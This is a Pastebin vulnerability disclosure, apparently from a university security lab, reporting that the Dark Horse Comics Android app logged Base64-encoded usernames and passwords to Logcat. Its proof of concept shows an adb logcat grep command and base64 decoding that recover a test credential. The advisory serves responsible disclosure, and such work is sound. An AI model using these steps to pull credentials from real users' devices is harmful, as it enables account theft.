SHARE
TWEET

Security Vulnerability in Dark Horse Comics - Logging Sensit

friendlyjlee Oct 7th, 2019 (edited) 311 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. # Title: Dark Horse Comics - Logging Sensitive Information
  2. # Application: Dark Horse Comics
  3. # Version: 1.3.21
  4. # Software Link: https://play.google.com/store/apps/details?id=com.darkhorse.digital
  5. # Company: Dark Horse Comics
  6. # Installs: 1,000,000+
  7. # Impact: hackers can get username and password of Dark Horse Comics, looking at the log.
  8. # Category: Mobile Apps
  9. # Tested on: Android 9
  10.  
  11. ---Description---
  12. Dark Horse Comics, the popular comics app installed more than 1 million, stores a user token in Logcat. The user token is the Base64-encoded string from password and username, so by decoding it, hackers can obtain usernames and passwords of the app.
  13. Especially, in old Android versions prior to Android Jelly Bean, any app installed can access Logcat without any permission.
  14.  
  15.  
  16. ---Vendor feedback---
  17. After reporting, the vendor has quickly fixed this problem and released a new version.
  18.  
  19. ---PoC---
  20. 1. Try to log in Dark Horse Comics, Android app.
  21.   - Opening Login UI
  22.   - Enter credentials. Fake information is enough for reproducing.
  23.        
  24. 2. Search the token in the log
  25. $ adb logcat | grep 'request with token'
  26.  
  27. 09-16 23:44:31.132 13303 14813 V DarkHorse.DungeonHTTPClient: Manually signing HTTP request with token: amFlaG8ubGVlQHJpY2UuZWR1Om15ZmFja3Bhc3N3b3Jk
  28.  
  29. 3. Decoding base64 to get a username and password.
  30. $ base64 -d
  31. amFlaG8ubGVlQHJpY2UuZWR1Om15ZmFja3Bhc3N3b3Jk
  32. jaeho.lee@rice.edu:myfackpassword
  33.  
  34. --Reporter---
  35. Jaeho Lee (Jaeho.Lee@rice.edu)
  36. Rice Computer Security Lab
  37. Rice University
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
 
Top